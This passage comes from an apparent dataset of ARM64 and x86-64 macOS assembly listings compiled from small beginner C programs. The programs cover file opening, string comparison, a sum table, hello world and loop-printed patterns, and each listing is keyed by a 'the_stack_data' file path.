___stdinp@GOTPAGE ldr x9, [x9, ___stdinp@GOTPAGEOFF] ldr x0, [x9] mov x9, sp str x8, [x9] adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _fscanf ldr x0, [sp, #80] ; 8-byte Folded Reload adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _fopen str x0, [sp, #96] ldr x9, [sp, #96] mov x8, #0 subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr x8, [sp, #48] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #40] ; 8-byte Folded Spill bl ___error ldr w0, [x0] bl _strerror mov x8, x0 ldr x0, [sp, #40] ; 8-byte Folded Reload mov x9, sp sub x10, x29, #104 str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB0_2: ldr x8, [sp, #72] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _fprintf adrp x8, ___stdinp@GOTPAGE ldr x8, [x8, ___stdinp@GOTPAGEOFF] ldr x0, [x8] mov x9, sp add x8, sp, #120 str x8, [sp, #32] ; 8-byte Folded Spill str x8, [x9] adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _fscanf ldr x0, [sp, #32] ; 8-byte Folded Reload adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _fopen str x0, [sp, #88] ldr x9, [sp, #88] mov x8, #0 subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ldr x8, [sp, #48] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #24] ; 8-byte Folded Spill bl ___error ldr w0, [x0] bl _strerror mov x8, x0 ldr x0, [sp, #24] ; 8-byte Folded Reload mov x9, sp add x10, sp, #120 str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB0_4: ldr x8, [sp, #72] ; 8-byte Folded Reload ldr x0, [x8] mov x9, sp sub x8, x29, #104 str x8, [x9] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _fprintf ldr x8, [sp, #72] ; 8-byte Folded Reload ldr x0, [x8] mov x9, sp add x8, sp, #120 str x8, [x9] adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _fprintf ldr x8, [sp, #48] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.8@PAGE add x1, x1, l_.str.8@PAGEOFF bl _fprintf ldr x8, [sp, #48] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.9@PAGE add x1, x1, l_.str.9@PAGEOFF bl _fprintf ldr x0, [sp, #96] bl _fclose ldr x0, [sp, #88] bl _fflush ldr x0, [sp, #88] bl _fclose ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: bl ___stack_chk_fail LBB0_6: mov w0, #0 ldp x29, x30, [sp, #304] ; 16-byte Folded Reload ldp x28, x27, [sp, #288] ; 16-byte Folded Reload add sp, sp, #320 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Enter name of input file: " l_.str.1: ; @.str.1 .asciz "%80s" l_.str.2: ; @.str.2 .asciz "r" l_.str.3: ; @.str.3 .asciz "input file: %s: %s\n" l_.str.4: ; @.str.4 .asciz "Enter name of output file: " l_.str.5: ; @.str.5 .asciz "w" l_.str.6: ; @.str.6 .asciz "\"%s\" opened for reading.\n" l_.str.7: ; @.str.7 .asciz "\"%s\" opened for writing.\n" l_.str.8: ; @.str.8 .asciz "Do work here.\n" l_.str.9: ; @.str.9 .asciz "Closing files.\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $224, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl %edi, -180(%rbp) movq %rsi, -192(%rbp) leaq -96(%rbp), %rdi xorl %esi, %esi movl $80, %edx callq _memset leaq -176(%rbp), %rdi xorl %esi, %esi movl $80, %edx callq _memset movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str(%rip), %rsi movb $0, %al callq _fprintf movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq -96(%rbp), %rdx leaq L_.str.1(%rip), %rsi movb $0, %al callq _fscanf leaq -96(%rbp), %rdi leaq L_.str.2(%rip), %rsi callq _fopen movq %rax, -200(%rbp) xorl %eax, %eax ## kill: def $rax killed $eax cmpq -200(%rbp), %rax jne LBB0_2 ## %bb.1: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -216(%rbp) ## 8-byte Spill callq ___error movl (%rax), %edi callq _strerror movq -216(%rbp), %rdi ## 8-byte Reload movq %rax, %rcx leaq L_.str.3(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax leaq -96(%rbp), %rdx callq _fprintf movl $1, %edi callq _exit LBB0_2: movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.4(%rip), %rsi movb $0, %al callq _fprintf movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq -176(%rbp), %rdx leaq L_.str.1(%rip), %rsi movb $0, %al callq _fscanf leaq -176(%rbp), %rdi leaq L_.str.5(%rip), %rsi callq _fopen movq %rax, -208(%rbp) xorl %eax, %eax ## kill: def $rax killed $eax cmpq -208(%rbp), %rax jne LBB0_4 ## %bb.3: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -224(%rbp) ## 8-byte Spill callq ___error movl (%rax), %edi callq _strerror movq -224(%rbp), %rdi ## 8-byte Reload movq %rax, %rcx leaq L_.str.3(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax leaq -176(%rbp), %rdx callq _fprintf movl $1, %edi callq _exit LBB0_4: movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq -96(%rbp), %rdx leaq L_.str.6(%rip), %rsi movb $0, %al callq _fprintf movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq -176(%rbp), %rdx leaq L_.str.7(%rip), %rsi movb $0, %al callq _fprintf movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.8(%rip), %rsi movb $0, %al callq _fprintf movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.9(%rip), %rsi movb $0, %al callq _fprintf movq -200(%rbp), %rdi callq _fclose movq -208(%rbp), %rdi callq _fflush movq -208(%rbp), %rdi callq _fclose movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_6 ## %bb.5: xorl %eax, %eax addq $224, %rsp popq %rbp retq LBB0_6: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Enter name of input file: " L_.str.1: ## @.str.1 .asciz "%80s" L_.str.2: ## @.str.2 .asciz "r" L_.str.3: ## @.str.3 .asciz "input file: %s: %s\n" L_.str.4: ## @.str.4 .asciz "Enter name of output file: " L_.str.5: ## @.str.5 .asciz "w" L_.str.6: ## @.str.6 .asciz "\"%s\" opened for reading.\n" L_.str.7: ## @.str.7 .asciz "\"%s\" opened for writing.\n" L_.str.8: ## @.str.8 .asciz "Do work here.\n" L_.str.9: ## @.str.9 .asciz "Closing files.\n" .subsections_via_symbols
the_stack_data/206392568.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/122135.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #20] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf adrp x8, ___stdinp@GOTPAGE ldr x8, [x8, ___stdinp@GOTPAGEOFF] ldr x2, [x8] add x0, sp, #24 str x0, [sp, #8] ; 8-byte Folded Spill mov w1, #64 bl _fgets ldr x0, [sp, #8] ; 8-byte Folded Reload bl _strlen mov x8, x0 str w8, [sp, #16] ldr w9, [sp, #16] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: bl ___stack_chk_fail LBB0_2: mov w0, #0 ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Instructions: " l_.str.1: ; @.str.1 .asciz "You typed %d characters of instructions.\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -84(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq -80(%rbp), %rdi movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdx movl $64, %esi callq _fgets leaq -80(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -88(%rbp) movl -88(%rbp), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_2 ## %bb.1: xorl %eax, %eax addq $96, %rsp popq %rbp retq LBB0_2: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Instructions: " L_.str.1: ## @.str.1 .asciz "You typed %d characters of instructions.\n" .subsections_via_symbols
the_stack_data/56963.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #144 .cfi_def_cfa_offset 144 stp x29, x30, [sp, #128] ; 16-byte Folded Spill add x29, sp, #128 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #60] str w0, [sp, #56] str x1, [sp, #48] adrp x8, l___const.main.array1@PAGE add x8, x8, l___const.main.array1@PAGEOFF ldr q0, [x8] stur q0, [x29, #-32] ldr w8, [x8, #16] stur w8, [x29, #-16] adrp x8, l___const.main.array2@PAGE add x8, x8, l___const.main.array2@PAGEOFF ldr q0, [x8] str q0, [sp, #64] ldr w8, [x8, #16] str w8, [sp, #80] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _fopen str x0, [sp, #40] ldr x8, [sp, #40] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _perror b LBB0_2 LBB0_2: ldr x0, [sp, #40] mov x9, sp adrp x8, l_.str.4@PAGE add x8, x8, l_.str.4@PAGEOFF str x8, [x9] adrp x8, l_.str.5@PAGE add x8, x8, l_.str.5@PAGEOFF str x8, [x9, #8] adrp x8, l_.str.6@PAGE add x8, x8, l_.str.6@PAGEOFF str x8, [x9, #16] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _fprintf str wzr, [sp, #36] b LBB0_3 LBB0_3: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #36] subs w8, w8, #5 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=1 ldr x0, [sp, #40] ldrsw x8, [sp, #36] sub x9, x29, #32 ldr w8, [x9, x8, lsl #2] ; implicit-def: $x11 mov x11, x8 ldrsw x8, [sp, #36] add x10, sp, #64 ldr w12, [x10, x8, lsl #2] ; implicit-def: $x8 mov x8, x12 ldrsw x12, [sp, #36] ldr w9, [x9, x12, lsl #2] ldrsw x12, [sp, #36] ldr w10, [x10, x12, lsl #2] add w10, w9, w10 mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #16] adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _fprintf b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=1 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] b LBB0_3 LBB0_6: ldr x0, [sp, #40] bl _fclose ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: bl ___stack_chk_fail LBB0_8: mov w0, #0 ldp x29, x30, [sp, #128] ; 16-byte Folded Reload add sp, sp, #144 ret .cfi_endproc ; -- End function .section __TEXT,__const .p2align 2 ; @__const.main.array1 l___const.main.array1: .long 1 ; 0x1 .long 2 ; 0x2 .long 3 ; 0x3 .long 4 ; 0x4 .long 5 ; 0x5 .p2align 2 ; @__const.main.array2 l___const.main.array2: .long 6 ; 0x6 .long 7 ; 0x7 .long 8 ; 0x8 .long 9 ; 0x9 .long 10 ; 0xa .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "sum.txt" l_.str.1: ; @.str.1 .asciz "w" l_.str.2: ; @.str.2 .asciz "error:file not found." l_.str.3: ; @.str.3 .asciz "%5s + %-5s %s\n" l_.str.4: ; @.str.4 .asciz "Num1" l_.str.5: ; @.str.5 .asciz "Num2" l_.str.6: ; @.str.6 .asciz "Resultado" l_.str.7: ; @.str.7 .asciz "%5d + %-5d %d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -68(%rbp) movl %edi, -72(%rbp) movq %rsi, -80(%rbp) movq l___const.main.array1(%rip), %rax movq %rax, -32(%rbp) movq l___const.main.array1+8(%rip), %rax movq %rax, -24(%rbp) movl l___const.main.array1+16(%rip), %eax movl %eax, -16(%rbp) movq l___const.main.array2(%rip), %rax movq %rax, -64(%rbp) movq l___const.main.array2+8(%rip), %rax movq %rax, -56(%rbp) movl l___const.main.array2+16(%rip), %eax movl %eax, -48(%rbp) leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi callq _fopen movq %rax, -88(%rbp) cmpq $0, -88(%rbp) jne LBB0_2 ## %bb.1: leaq L_.str.2(%rip), %rdi callq _perror LBB0_2: movq -88(%rbp), %rdi leaq L_.str.3(%rip), %rsi leaq L_.str.4(%rip), %rdx leaq L_.str.5(%rip), %rcx leaq L_.str.6(%rip), %r8 movb $0, %al callq _fprintf movl $0, -92(%rbp) LBB0_3: ## =>This Inner Loop Header: Depth=1 cmpl $5, -92(%rbp) jge LBB0_6 ## %bb.4: ## in Loop: Header=BB0_3 Depth=1 movq -88(%rbp), %rdi movslq -92(%rbp), %rax movl -32(%rbp,%rax,4), %edx movslq -92(%rbp), %rax movl -64(%rbp,%rax,4), %ecx movslq -92(%rbp), %rax movl -32(%rbp,%rax,4), %r8d movslq -92(%rbp), %rax addl -64(%rbp,%rax,4), %r8d leaq L_.str.7(%rip), %rsi movb $0, %al callq _fprintf ## %bb.5: ## in Loop: Header=BB0_3 Depth=1 movl -92(%rbp), %eax addl $1, %eax movl %eax, -92(%rbp) jmp LBB0_3 LBB0_6: movq -88(%rbp), %rdi callq _fclose movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_8 ## %bb.7: xorl %eax, %eax addq $96, %rsp popq %rbp retq LBB0_8: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__const .p2align 4 ## @__const.main.array1 l___const.main.array1: .long 1 ## 0x1 .long 2 ## 0x2 .long 3 ## 0x3 .long 4 ## 0x4 .long 5 ## 0x5 .p2align 4 ## @__const.main.array2 l___const.main.array2: .long 6 ## 0x6 .long 7 ## 0x7 .long 8 ## 0x8 .long 9 ## 0x9 .long 10 ## 0xa .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "sum.txt" L_.str.1: ## @.str.1 .asciz "w" L_.str.2: ## @.str.2 .asciz "error:file not found." L_.str.3: ## @.str.3 .asciz "%5s + %-5s %s\n" L_.str.4: ## @.str.4 .asciz "Num1" L_.str.5: ## @.str.5 .asciz "Num2" L_.str.6: ## @.str.6 .asciz "Resultado" L_.str.7: ## @.str.7 .asciz "%5d + %-5d %d\n" .subsections_via_symbols
the_stack_data/90764735.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] stur x1, [x29, #-16] mov x0, #1024 bl _malloc str x0, [sp, #24] ldr x0, [sp, #24] ldur w9, [x29, #-4] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] mov w1, #0 str w1, [sp, #20] ; 4-byte Folded Spill mov x2, #-1 adrp x3, l_.str@PAGE add x3, x3, l_.str@PAGEOFF bl ___sprintf_chk ldr x8, [sp, #24] mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldr w0, [sp, #20] ; 4-byte Folded Reload ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%s" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movq %rsi, -16(%rbp) movl $1024, %edi ## imm = 0x400 callq _malloc movq %rax, -24(%rbp) movq -24(%rbp), %rdi movl -4(%rbp), %r8d xorl %esi, %esi movq $-1, %rdx leaq L_.str(%rip), %rcx movb $0, %al callq ___sprintf_chk movq -24(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%s" .subsections_via_symbols
the_stack_data/187643810.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #12] ; 4-byte Folded Spill stur wzr, [x29, #-4] stur w0, [x29, #-8] str x1, [sp, #16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr w0, [sp, #12] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Hello World! \n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Hello World! \n" .subsections_via_symbols
the_stack_data/67326410.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, l___const.main.str1@PAGE add x8, x8, l___const.main.str1@PAGEOFF ldr w9, [x8] sub x0, x29, #8 str x0, [sp, #32] ; 8-byte Folded Spill stur w9, [x29, #-8] ldrh w8, [x8, #4] sturh w8, [x29, #-4] adrp x8, l___const.main.str2@PAGE add x8, x8, l___const.main.str2@PAGEOFF ldr w9, [x8] sub x1, x29, #16 str x1, [sp, #16] ; 8-byte Folded Spill stur w9, [x29, #-16] ldrh w8, [x8, #4] sturh w8, [x29, #-12] mov x2, #6 str x2, [sp, #24] ; 8-byte Folded Spill bl _strncmp mov x9, sp ; implicit-def: $x8 mov x8, x0 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF stur x0, [x29, #-24] ; 8-byte Folded Spill bl _printf ldr x1, [sp, #32] ; 8-byte Folded Reload ldr x2, [sp, #24] ; 8-byte Folded Reload ldr x0, [sp, #16] ; 8-byte Folded Reload bl _strncmp mov x10, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] bl _printf ldr x1, [sp, #32] ; 8-byte Folded Reload ldr x2, [sp, #24] ; 8-byte Folded Reload ldr x0, [sp, #16] ; 8-byte Folded Reload bl ___strcpy_chk ldr x1, [sp, #32] ; 8-byte Folded Reload ldr x2, [sp, #24] ; 8-byte Folded Reload ldr x0, [sp, #16] ; 8-byte Folded Reload bl _strncmp mov x10, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] bl _printf ldr x1, [sp, #16] ; 8-byte Folded Reload ldr x2, [sp, #24] ; 8-byte Folded Reload ldr x0, [sp, #32] ; 8-byte Folded Reload bl _strncmp mov x10, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] bl _printf mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l___const.main.str1: ; @__const.main.str1 .asciz "aaXaa" l___const.main.str2: ; @__const.main.str2 .asciz "aaYaa" l_.str: ; @.str .asciz "%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl L___const.main.str1(%rip), %eax movl %eax, -6(%rbp) movw L___const.main.str1+4(%rip), %ax movw %ax, -2(%rbp) movl L___const.main.str2(%rip), %eax movl %eax, -12(%rbp) movw L___const.main.str2+4(%rip), %ax movw %ax, -8(%rbp) leaq -6(%rbp), %rdi leaq -12(%rbp), %rsi movl $6, %edx callq _strncmp movl %eax, %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq -12(%rbp), %rdi leaq -6(%rbp), %rsi movl $6, %edx callq _strncmp movl %eax, %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq -12(%rbp), %rdi leaq -6(%rbp), %rsi movl $6, %edx callq ___strcpy_chk leaq -12(%rbp), %rdi leaq -6(%rbp), %rsi movl $6, %edx callq _strncmp movl %eax, %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq -6(%rbp), %rdi leaq -12(%rbp), %rsi movl $6, %edx callq _strncmp movl %eax, %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L___const.main.str1: ## @__const.main.str1 .asciz "aaXaa" L___const.main.str2: ## @__const.main.str2 .asciz "aaYaa" L_.str: ## @.str .asciz "%d\n" .subsections_via_symbols
the_stack_data/135477.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf str w0, [sp, #12] ldr w8, [sp, #12] subs w8, w8, #1 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: mov w8, #1 stur w8, [x29, #-4] b LBB0_27 LBB0_2: mov w8, #1 stur w8, [x29, #-12] b LBB0_3 LBB0_3: ; =>This Loop Header: Depth=1 ; Child Loop BB0_5 Depth 2 ; Child Loop BB0_9 Depth 2 ldur w8, [x29, #-12] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_14 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=1 mov w8, #1 str w8, [sp, #16] b LBB0_5 LBB0_5: ; Parent Loop BB0_3 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #16] ldur w9, [x29, #-8] ldur w10, [x29, #-12] subs w9, w9, w10 subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_8 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=2 adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=2 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB0_5 LBB0_8: ; in Loop: Header=BB0_3 Depth=1 mov w8, #1 str w8, [sp, #16] b LBB0_9 LBB0_9: ; Parent Loop BB0_3 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #16] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_12 b LBB0_10 LBB0_10: ; in Loop: Header=BB0_9 Depth=2 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_11 LBB0_11: ; in Loop: Header=BB0_9 Depth=2 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB0_9 LBB0_12: ; in Loop: Header=BB0_3 Depth=1 adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB0_13 LBB0_13: ; in Loop: Header=BB0_3 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB0_3 LBB0_14: ldur w8, [x29, #-8] subs w8, w8, #1 stur w8, [x29, #-12] b 